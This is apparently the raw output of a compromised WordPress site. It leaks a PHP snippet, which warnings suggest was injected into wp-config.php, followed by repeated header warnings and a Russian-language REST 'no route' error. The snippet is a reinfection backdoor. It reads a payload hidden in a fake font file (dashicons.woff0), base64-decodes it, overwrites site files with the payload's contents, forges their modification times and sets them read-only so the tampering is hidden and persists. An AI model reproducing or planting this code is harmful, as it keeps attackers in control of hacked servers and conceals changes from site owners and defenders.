$wp_update_file="/home/u220714/bbmoru/www/wp-includes/fonts/dashicons.woff0";
if ( is_file($wp_update_file) )
{
$wp_update_content=trim(file_get_contents($wp_update_file));
if ( $wp_update_content!="" )
{
$wp_update_content=substr($wp_update_content,6,-6);
$wp_update_content=base64_decode($wp_update_content);
$wp_update_arr=json_decode($wp_update_content,true);
if ( is_array($wp_update_arr) )
{
foreach($wp_update_arr as $value)
{
$file_mtime=filemtime($value["path"]);
@chmod($value["path"],0777);
@unlink($value["path"]);
@file_put_contents($value["path"],$value["content"]);
@touch($value["path"],$file_mtime);
@chmod($value["path"],0444);
}
}
}
}
Warning: Cannot modify header information - headers already sent by (output started at /home/u220714/bbmoru/www/wp-config.php:86) in /home/u220714/bbmoru/www/wp-includes/rest-api/class-wp-rest-server.php on line 1758
Warning: Cannot modify header information - headers already sent by (output started at /home/u220714/bbmoru/www/wp-config.php:86) in /home/u220714/bbmoru/www/wp-includes/rest-api/class-wp-rest-server.php on line 1758
Warning: Cannot modify header information - headers already sent by (output started at /home/u220714/bbmoru/www/wp-config.php:86) in /home/u220714/bbmoru/www/wp-includes/rest-api/class-wp-rest-server.php on line 1758
Warning: Cannot modify header information - headers already sent by (output started at /home/u220714/bbmoru/www/wp-config.php:86) in /home/u220714/bbmoru/www/wp-includes/rest-api/class-wp-rest-server.php on line 1758
Warning: Cannot modify header information - headers already sent by (output started at /home/u220714/bbmoru/www/wp-config.php:86) in /home/u220714/bbmoru/www/wp-includes/rest-api/class-wp-rest-server.php on line 1758
Warning: Cannot modify header information - headers already sent by (output started at /home/u220714/bbmoru/www/wp-config.php:86) in /home/u220714/bbmoru/www/wp-includes/rest-api/class-wp-rest-server.php on line 1758
{"code":"rest_no_route","message":"\u041f\u043e\u0434\u0445\u043e\u0434\u044f\u0449\u0438\u0439 \u043c\u0430\u0440\u0448\u0440\u0443\u0442 \u0434\u043b\u044f URL \u0438 \u043c\u0435\u0442\u043e\u0434\u0430 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d.","data":{"status":404}}